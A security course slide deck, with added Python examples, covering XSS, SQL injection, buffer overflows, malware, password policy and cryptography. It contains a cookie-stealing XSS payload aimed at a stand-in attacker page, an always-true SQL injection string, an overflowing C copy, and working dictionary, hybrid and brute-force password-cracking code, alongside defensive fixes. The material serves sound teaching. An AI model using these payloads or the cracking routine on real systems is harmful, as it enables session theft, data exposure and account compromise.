Module 04: 1
Introduction to Computer Security and Information Assurance
Knowledge Check
• Which of the following are operating system functions?
– Process management
– Graphics acceleration
– Memory management
• Give two countermeasures for each of the following threats:
– Backdoor
– DoS
Module 04: 2
Objectives
• Identify common threats associated with applications and personal information
• Apply basic techniques to secure individual information on a computer
Module 04: 3
Objectives
• Apply appropriate countermeasures to protect applications from identified threats
• Identify common vulnerabilities in password creation
• Use cryptographic techniques to hide and restore information
Module 04: 4
Application Security
• Protection of applications against threats
• Use procedures, software design, and access control to reduce application risk
Module 04: 5
Application And OS Security
• Similar threats, vulnerabilities, and countermeasures
• Applications work closely with the OS regarding access, resources, and privileges
Module 04: 6
Common Application Security Threats
• Unauthorized access to applications
• Cross-Site Scripting (XSS)
• SQL injection
• Buffer overflow
• Arbitrary code execution
Module 04: 7
Unauthorized Access to Applications
• Application does not include a mechanism to control access privilege
– Anyone can access the application
– Anyone can run the application
• Unauthorized disclosure of data
• Data integrity problems
Module 04: 8
Cross-Site Scripting (XSS)
• Attacker injects script into a page served by a trusted site; the victim's browser runs it in that site's security context, with the same access as the site's own scripts
• Attacks the end user, not the server
• User is unaware that the page they are seeing has malicious elements
Module 04: 9
Cross-Site Scripting (XSS): attack flow (figure; recoverable steps only)
1. Attacker sends the victim a phishing e-mail (From: Bad Guy, To: Victim) containing a "CLICK HERE" link
2. Attacker convinces the user to access the infected Web page
3. User accesses the Web page with malicious code; the page displays and the user sees what looks like a normal, valid session with the target site
4. Malicious code is executed in the security context of the target site
5. Information is sent to the attacker
Module 04: 10
Cross-Site Scripting (XSS)

    <a href="http://…/Search.asp?Search=<script language='javascript'>
        document.location.replace('http://localhost/EvilPage.asp?Cookie=' + document.cookie);
    </script>">…</a>

• The HTML contains embedded JavaScript; when Search.asp reflects the Search parameter into its page unencoded, the script redirects the browser to the attacker's page and transmits the cookies issued by the target site
• http://…/Search.asp is the URL of the site targeted by the attack
Module 04: 11
Structured Query Language (SQL) Injection
• Executes commands not intended by the developer
• Exploits poor input validation: user input is concatenated into the SQL text
• Countered by coding techniques (parameterized queries, input validation)
Module 04: 12
SQL Injection Attack
• Normal SQL command, built by string concatenation in the application (ASP/VBScript style):

    "SELECT * FROM Members WHERE name = '" & username & "';"

• Malicious input  a' or 'b'='b  closes the quoted string and produces:

    SELECT * FROM Members WHERE name = 'a' or 'b'='b';

• 'b'='b' is always true, so every row of Members is returned
Module 04: 13
Buffer Overflow
• Takes place when a program writes more data into a fixed-size buffer than the buffer can hold, overwriting adjacent memory
• Common implementation: attacker gives the program more input than the reserved memory can hold, typically through an unchecked copy such as strcpy
Module 04: 14
Buffer Overflow Example

    #include <stdio.h>
    #include <string.h>

    void func(char *p)
    {
        char stack_temp[20];           /* 20-byte buffer on the stack */
        strcpy(stack_temp, p);         /* no length check: copies until the NUL byte */
        printf("%s\n", stack_temp);    /* printf(stack_temp) would add a format-string bug */
    }

    int main(int argc, char *argv[])
    {
        /* 38 characters plus the terminating NUL: 39 bytes into a 20-byte buffer */
        func("I AM MORE THAN TWENTY CHARACTERS LONG!");
        return 0;
    }
Module 04: 15
Arbitrary Code Execution Vulnerability
• Software bug that allows an attacker to run code of their choosing on the target machine
– Remote code execution when it can be triggered over the network
• Commonly achieved by corrupting memory (e.g. through a buffer overflow) so that the program counter of the running process is redirected to attacker-controlled code
• Common in applications that process untrusted input (browsers, document viewers, network services)
Module 04: 16
Application Security Countermeasures
• Unauthorized access to application
• Cross-Site Scripting (XSS)
• SQL injection
• Buffer overflow
• Arbitrary code execution
Module 04: 17
Unauthorized Access Countermeasures
• Access control determines which subjects (users, processes) may use the application and what they may do
• Can be implemented based on users, permissions, and folder structures
– User ID and password (authentication) before any privilege is granted
Module 04: 18
Cross-Site Scripting (XSS) Countermeasures
• Web server owner should:
– Keep the Web server updated
– Scan for XSS vulnerabilities
– Configure applications and servers properly
– Encode untrusted data for the context it is placed in (HTML text, attribute, JavaScript, URL) and validate input
– Mark session cookies HttpOnly so injected script cannot read them through document.cookie
• User should:
– Keep the Web browser updated
– Practice safe Web surfing
– Attend awareness training
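Added example (not from the deck) showing the Search.asp payload from the earlier slide against a reflecting page, first rendered unencoded and then HTML-encoded, plus the HttpOnly cookie setting named above. The host name target.example, the page layout, and the cookie token are assumptions; the payload text is constructed to match the slide.

```python
import html
from urllib.parse import quote, urlparse, parse_qs

# Constructed payload in the shape of the deck's Search.asp example; the host
# target.example is an assumption (the slide elides it).
PAYLOAD = ("<script language='javascript'>document.location.replace("
           "'http://localhost/EvilPage.asp?Cookie=' + document.cookie);</script>")
ATTACK_LINK = "http://target.example/Search.asp?Search=" + quote(PAYLOAD)


def search_param(url):
    """What the server sees as the Search parameter once the link is clicked."""
    return parse_qs(urlparse(url).query).get("Search", [""])[0]


def render_search_vulnerable(query):
    """Reflects the untrusted value straight into the HTML (reflected XSS)."""
    return "<h1>Results for " + query + "</h1>"


def render_search_safe(query):
    """Encodes the value for an HTML text context: < > & " ' become entities,
    so the browser shows the payload as text instead of executing it."""
    return "<h1>Results for " + html.escape(query, quote=True) + "</h1>"


def reflected_as_markup(page):
    """True if a <script> tag made it into the page as live markup."""
    return "<script" in page.lower()


def session_cookie_header(token):
    """HttpOnly keeps the session token out of document.cookie, so even a
    successful injection cannot exfiltrate it the way the slide's payload does."""
    return "Set-Cookie: session=%s; HttpOnly; Secure; SameSite=Lax" % token


if __name__ == "__main__":
    q = search_param(ATTACK_LINK)
    print("vulnerable:", render_search_vulnerable(q))
    print("safe:      ", render_search_safe(q))
    print(session_cookie_header("assumed-token"))
```

html.escape is only correct for the HTML text and attribute contexts; a value placed inside a script block or a URL needs the encoding for that context, which is why the countermeasure is stated per context.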
Module 04: 19
SQL Injection Countermeasures
• Parameterized queries (prepared statements), so user input is never concatenated into SQL text
• Input validation
• Manual code review
• Least privilege for the database account the application uses
– When not required, disable privileges to stored procedures, tables, etc.
– Grant only the statements the application needs (e.g. SELECT, UPDATE, DELETE on specific tables and the stored procedures it calls); never connect as the database administrator
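Added example (not from the deck) that runs the slide's injection string against an in-memory SQLite table two ways: with the concatenated query from the attack slide and with a parameterized query, plus a simple input-validation check. The Members rows are constructed sample data.

```python
import sqlite3

# Constructed sample rows for the deck's Members table.
SAMPLE_MEMBERS = [("alice", "alice@example.com"),
                  ("bob", "bob@example.com"),
                  ("carol", "carol@example.com")]

# The deck's payload: closes the quoted string and appends an always-true condition.
INJECTION = "a' or 'b'='b"


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE Members (name TEXT, email TEXT)")
    conn.executemany("INSERT INTO Members VALUES (?, ?)", SAMPLE_MEMBERS)
    conn.commit()
    return conn


def find_member_vulnerable(conn, username):
    """String concatenation, as on the slide: the input becomes part of the SQL text."""
    sql = "SELECT * FROM Members WHERE name = '" + username + "';"
    return conn.execute(sql).fetchall()


def find_member_safe(conn, username):
    """Parameterized query: the driver passes the value separately from the
    statement, so quotes in the input are data, never syntax."""
    return conn.execute("SELECT * FROM Members WHERE name = ?;", (username,)).fetchall()


def is_valid_username(username):
    """Input validation as defence in depth: accept only what a user name may contain."""
    return 1 <= len(username) <= 32 and username.isalnum()


if __name__ == "__main__":
    db = make_db()
    print("concatenated:", find_member_vulnerable(db, INJECTION))   # every row
    print("parameterized:", find_member_safe(db, INJECTION))        # no rows
    print("valid input?", is_valid_username(INJECTION))
```

Least privilege is applied outside the code: the account behind make_db would be granted SELECT on Members only, so even a successful injection could not read or change other tables.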
Module 04: 20
Buffer Overflow Countermeasures
• Write secure code: use bounds-checked functions (strncpy, snprintf, strlcpy) and check lengths before copying
• Use compiler and platform protections (stack canaries, non-executable stack, ASLR) and static analysis to flag unsafe calls such as strcpy and gets
• Have a limited number of processes running
• Keep your application updated with the latest patches from the software vendor
• Control privilege: run with the least privilege needed, so a successful overflow gains less
Module 04: 21
Arbitrary Code Execution Countermeasures
• Install the latest updates and Service Packs
• Disable scripting and ActiveX
• Configure the application securely
• Use alternate, safer applications
Module 04: 22
Individual Security
• Protecting personal systems and information from attack
• Also known as 'Personal Security'
Module 04: 23
Personal Information Threats
• Unauthorized access to personal information
• Loss of personal information
• Unauthorized disclosure of personal information
• Spoofing
• Malicious software (Malware)
Module 04: 24
Unauthorized Access to Personal Information
• Commonly done by cracking user passwords
– Recovering passwords from data that has been stored in or transmitted by a computer system
– Password cracking methods:
• Dictionary
• Hybrid
• Brute force
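Added example (not from the deck or the activity's tool) implementing the three cracking methods above against a constructed hash dump whose passwords are taken from the activity's results table. Assumption: an unsalted SHA-256 digest stands in for the Windows NT hash so the block runs with the standard library alone; the word list is a constructed toy.

```python
import hashlib
import itertools
import string


def h(password):
    """Stand-in for the stored hash (assumption: SHA-256 in place of the NT hash)."""
    return hashlib.sha256(password.encode()).hexdigest()


# Constructed "dump" of user -> hash, passwords from the deck's activity table.
STORED = {
    "andy":   h("andy"),
    "helen":  h("helen2008"),
    "jason":  h("htimsnosaj"),
    "carlos": h("20973"),
    "bianca": h("b1@nc@&l33"),
}

# Constructed mini word list (real lists hold millions of entries).
WORDLIST = ["password", "andy", "helen", "jason", "computer", "jasonsmith"]


def dictionary_attack(target, words):
    """Try each word list entry as-is."""
    for w in words:
        if h(w) == target:
            return w
    return None


def hybrid_candidates(words):
    """Word list entries plus cheap mutations people actually use:
    capitalisation, reversal, an appended year or short number."""
    for w in words:
        yield w
        yield w.capitalize()
        yield w[::-1]
        for year in range(2000, 2011):
            yield w + str(year)
        for n in range(100):
            yield w + str(n)


def hybrid_attack(target, words):
    for c in hybrid_candidates(words):
        if h(c) == target:
            return c
    return None


def brute_force(target, alphabet=string.digits, max_len=5):
    """Exhaustive search; cost is len(alphabet) ** length, so it is limited
    here to short, digit-only passwords."""
    for n in range(1, max_len + 1):
        for tup in itertools.product(alphabet, repeat=n):
            c = "".join(tup)
            if h(c) == target:
                return c
    return None


def crack_all(stored, words):
    """Cheapest method first; returns user -> (method, password or None)."""
    results = {}
    for user, target in stored.items():
        found = dictionary_attack(target, words)
        if found is not None:
            results[user] = ("dictionary", found)
            continue
        found = hybrid_attack(target, words)
        if found is not None:
            results[user] = ("hybrid", found)
            continue
        found = brute_force(target)
        results[user] = ("brute force", found) if found is not None else ("uncracked", None)
    return results


if __name__ == "__main__":
    for user, (method, pw) in crack_all(STORED, WORDLIST).items():
        print(user, method, pw)
```

The order in which the users fall mirrors the activity: a bare dictionary word goes first, word-plus-year and reversed-name passwords fall to cheap mutations, a five-digit number falls to brute force, and the mixed-class password survives the attempted methods entirely.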
Module 04: 25
Activity 05.1: Cracking Windows Passwords
• Purpose:
– Show that password cracking is one of the most common forms of attack and how easily a weak password can be cracked
• Estimated completion time: 25 - 30 minutes
• Additional information: N/A
Module 04: 26
Activity 05.1: Password Cracking
• How difficult was it to crack the Windows passwords?
• Why are some passwords easier to crack than others?
Module 04: 27
Activity 05.1 results

User name          Password        Order cracked
Andy Johnson       andy            2
Helen Gonzalez     helen2008       4
Anthony Jackson    Computer        3
Jonas Puente       Jonas_Puente    7
Jennifer Dietz     marykay         8
Jason Smith        htimsnosaj      1
Bianca Lee         b1@nc@&l33      11
Mike Hardy         cold*beer       6
Carlos Rios        20973           5
Linda Nelson       n1h0nj1n        10
Student            *pdbmc12        9
Module 04: 28
Loss Of Personal Information
• Causes of data loss (source: http://www.stellarinfo.com/data_loss.htm, 2007):
– Human error, 32%
– Software corruption, 25%
– Virus attack, 22%
– Hardware failure, 13%
– Sabotage, 6%
– Natural disasters, 2%
Module 04: 29
Unauthorized Disclosure Of Personal Information
Module 04: 30
Spoofing
• A situation in which a person or program successfully masquerades as another by presenting false information
• Types of spoofing attacks:
– E-mail spoofing
– Web site spoofing
Module 04: 31
Malicious Software (Malware)
• Designed to damage or disrupt a system without the owner's consent
– Virus
– Worm
– Trojan horse
– Logic/Time bomb
– Spyware
– Adware
Module 04: 32
Virus
"Viruses are individual programs that, when placed on a target computer in such a way that they are subsequently executed, (thus 'infecting' the computer), can produce results ranging from the innocuous placement of a 'test' file to complete deletion of data and reformatting the hard drive."
Source: http://www.upenn.edu/computing/security/malware.php
Module 04: 33
Worm
"Worms are programs whose sole purpose is to replicate and spread themselves to other computers. Commonly, once a computer has been infected by a virus/worm (usually by opening an infected e-mail attachment), the virus component will set up and begin running a mail server, and the worm component will begin to replicate the virus/worm and e-mail it to addresses found in the computer's e-mail address book."
Source: http://www.upenn.edu/computing/security/malware.php
Module 04: 34
Trojan Horse Application
"Programs that are designed and written to look like normal, useful programs, but contain hidden code that can perform a wide variety of compromises up to and including granting a remote user complete control of the compromised computer."
Source: http://www.upenn.edu/computing/security/malware.php
Module 04: 35
Logic/Time Bomb
"A program, or portion of a program, which lies dormant until a specific piece of program logic is activated. The most common activator for a logic bomb is a date…A logic bomb could also be programmed to wait for a certain message from the programmer."
Source: http://www.tech-faq.com/logic-bomb.shtml
Module 04: 36
Spyware
"Spyware consists of computer software that gathers information about a computer user (such as browsing patterns in the more benign case or credit card numbers in more serious ones) and then transmits this information to an external entity without the knowledge or informed consent of the user."
Source: http://www.jellico.com/spyware.html
Module 04: 37
Adware
"Adware or advertising-supported software is any software application in which advertisements are displayed while the program is running. These applications include additional code that displays the ads in pop-up windows or through a bar that appears on a computer screen."
Source: http://www.jellico.com/spyware.html
Module 04: 38
Personal Information Security Countermeasures
• Password policies
• Backup
• Cryptography
• Spoofing countermeasures
• Malware countermeasures
Module 04: 39
Password Policies
• Enforce password history: 10 passwords
• Maximum password age: 120 days
• Minimum password age: 5 days
• Minimum password length: 15 characters
• Password must meet complexity requirements: Enabled
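Added example (not from the deck) that enforces the five settings above on a password change: minimum age, minimum length, complexity, and a salted hash history of the last ten passwords, with maximum age checked separately. Assumptions: the complexity rule is a simplified form of the Windows one (three of four character classes and the user name must not appear), and the history is kept in memory with PBKDF2 rather than in a directory.

```python
import hashlib
import os

# The deck's settings (the slide's values, not operating-system defaults).
POLICY = {"history": 10, "max_age_days": 120, "min_age_days": 5, "min_length": 15}


def meets_complexity(password, username):
    """Simplified Windows 'complexity requirements' (assumption): characters from
    at least three classes, and the user name must not appear in the password."""
    classes = (any(c.isupper() for c in password),
               any(c.islower() for c in password),
               any(c.isdigit() for c in password),
               any(not c.isalnum() for c in password))
    return sum(classes) >= 3 and username.lower() not in password.lower()


def _hash(password, salt):
    # Salted, slow hash so a leaked history store does not hand over old passwords.
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 20_000)


class PasswordHistory:
    """Keeps the last N password hashes so 'enforce password history' can be checked."""

    def __init__(self, size):
        self.size = size
        self.entries = []            # list of (salt, digest)

    def seen(self, password):
        return any(_hash(password, salt) == digest for salt, digest in self.entries)

    def add(self, password):
        salt = os.urandom(16)
        self.entries.append((salt, _hash(password, salt)))
        self.entries = self.entries[-self.size:]


def validate_change(new_password, username, history, days_since_last_change):
    """Returns the list of policy violations; an empty list means the change is allowed."""
    problems = []
    if days_since_last_change < POLICY["min_age_days"]:
        problems.append("minimum password age not reached")
    if len(new_password) < POLICY["min_length"]:
        problems.append("shorter than %d characters" % POLICY["min_length"])
    if not meets_complexity(new_password, username):
        problems.append("does not meet complexity requirements")
    if history.seen(new_password):
        problems.append("reused from password history")
    return problems


def must_rotate(days_since_last_change):
    """Maximum password age: True once the password is older than the limit."""
    return days_since_last_change > POLICY["max_age_days"]


if __name__ == "__main__":
    hist = PasswordHistory(POLICY["history"])
    hist.add("correct horse battery staple 1!")
    print(validate_change("helen2008", "helen", hist, 30))
    print(validate_change("correct horse battery staple 1!", "alice", hist, 30))
```

Minimum age matters together with history: without it a user could cycle through eleven changes in a minute and land back on the old password.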
Module 04: 40
What Is A Backup?
• Copying files to a second medium for later retrieval as a precaution in case the first medium fails
– Perform frequently
– Keep in a separate location
Module 04: 41
Why Should We Back Up?
• "93% of companies that lost their data center for 10 days or more due to a disaster filed for bankruptcy within one year of the disaster. 50% of businesses that found themselves without data management for this same time period filed for bankruptcy immediately." (Source: National Archives & Records Administration in Washington.)
• "Nearly 90% of computer users who had their laptops stolen said the device contained company communications, as well as confidential business and personal information" (Source: Credent Technology)
Module 04: 42
Cryptography
• Definition
• Services of cryptography
• Public Key Infrastructure (PKI)
Photo: Enigma machine. Courtesy, British Royal Navy Museum
Photo: Excerpt of Alan Turing's notes on Enigma. Courtesy British National Archives
Module 04: 43
Cryptography Definition
• Principles, means, and methods for rendering plain information unintelligible, and restoring encrypted information to intelligible form
• Encryption transforms data into an unreadable format
• Decryption restores data to its original format
• Encryption and decryption schemes are based upon algorithms
(National Information Systems Security Glossary)
Module 04: 44
How Cryptography Works
• Plaintext: Hello!
• Encryption produces the ciphertext: qANQR1DBwU4DlCm0PeFuV+8Q23B
• Decryption restores: Hello!
Module 04: 45
Public Key Infrastructure (PKI)
• Programs, data formats, procedures, communication protocols, security policies, and public key cryptography mechanisms working in a comprehensive manner, enabling a wide range of dispersed people to communicate in a secure and predictable fashion
Source: http://searchsecurity.techtarget.com/generic/0,295582,sid14_gci1328971,00.html
Module 04: 46
Services Of Cryptography
• Confidentiality
• Integrity
• Authentication
• Non-repudiation
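Added example (not from the deck or the Cryptainer tool used in the activity) that carries the "Hello!" round trip from the How Cryptography Works slide through code and shows three of the four services above: confidentiality from the cipher, integrity and authentication from an HMAC tag checked before decryption. Assumptions: the keystream is an illustrative SHA-256 counter construction standing in for a real cipher, the key is shared by both parties, and the nonce and tag sizes are fixed here.

```python
import hashlib
import hmac
import os

NONCE_LEN, TAG_LEN = 16, 32


def _subkeys(key):
    """Derive separate encryption and MAC keys from one shared master key."""
    return (hashlib.sha256(b"enc" + key).digest(),
            hashlib.sha256(b"mac" + key).digest())


def _keystream(enc_key, nonce, length):
    """Illustrative counter-mode keystream from SHA-256 (assumption: a stand-in;
    a real system uses a vetted cipher such as AES-GCM or ChaCha20-Poly1305)."""
    out = b""
    counter = 0
    while len(out) < length:
        out += hashlib.sha256(enc_key + nonce + counter.to_bytes(8, "big")).digest()
        counter += 1
    return out[:length]


def encrypt(key, plaintext):
    """Confidentiality (XOR with the keystream) plus integrity and
    authentication (HMAC tag over nonce and ciphertext)."""
    enc_key, mac_key = _subkeys(key)
    nonce = os.urandom(NONCE_LEN)          # fresh per message: never reuse with a key
    ct = bytes(p ^ k for p, k in zip(plaintext, _keystream(enc_key, nonce, len(plaintext))))
    tag = hmac.new(mac_key, nonce + ct, hashlib.sha256).digest()
    return nonce + ct + tag


def decrypt(key, blob):
    """Encrypt-then-MAC: verify the tag in constant time first, then undo the XOR."""
    enc_key, mac_key = _subkeys(key)
    nonce, ct, tag = blob[:NONCE_LEN], blob[NONCE_LEN:-TAG_LEN], blob[-TAG_LEN:]
    expected = hmac.new(mac_key, nonce + ct, hashlib.sha256).digest()
    if not hmac.compare_digest(tag, expected):
        raise ValueError("authentication failed: wrong key or modified ciphertext")
    return bytes(c ^ k for c, k in zip(ct, _keystream(enc_key, nonce, len(ct))))


def tamper(blob, index):
    """Flip one bit at the given offset (used to show that modification is detected)."""
    return blob[:index] + bytes([blob[index] ^ 0x01]) + blob[index + 1:]


if __name__ == "__main__":
    key = os.urandom(32)
    blob = encrypt(key, b"Hello!")
    print(blob.hex())                        # unreadable, like the slide's ciphertext
    print(decrypt(key, blob))                # b'Hello!'
```

Non-repudiation is the service this construction cannot give: both sides hold the same key, so either could have produced the tag. That needs a digital signature made with a private key, which is where the PKI of the next slides comes in.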
Module 04: 47
Activity 05.2: Cryptography
• Purpose:
– Show the role of cryptography in protecting sensitive information
• Estimated completion time: 10 - 20 minutes
• Additional information:
– You will be able to encrypt and decrypt a file using Cypherix's Cryptainer LE program
Module 04: 48
Activity 05.2: Cryptography
• How difficult is it to encrypt a message?
• How difficult is it to decrypt a message?
• How does cryptography help to protect personal information?
Module 04: 49
Spoofing Countermeasures
• Practice safe e-mail usage and Web surfing
• Attend security awareness training
Module 04: 50
Malware Countermeasures
• Only run software you can trust
• Install antivirus software
• Scan file attachments with antivirus software before opening
• Verify critical file integrity
• Backup! Backup! Backup!
Module 04: 51
Application And Personal Information Security
• Application security
– Common application security threats
– Countermeasures
• Personal information security
– Common threats to personal information
– Countermeasures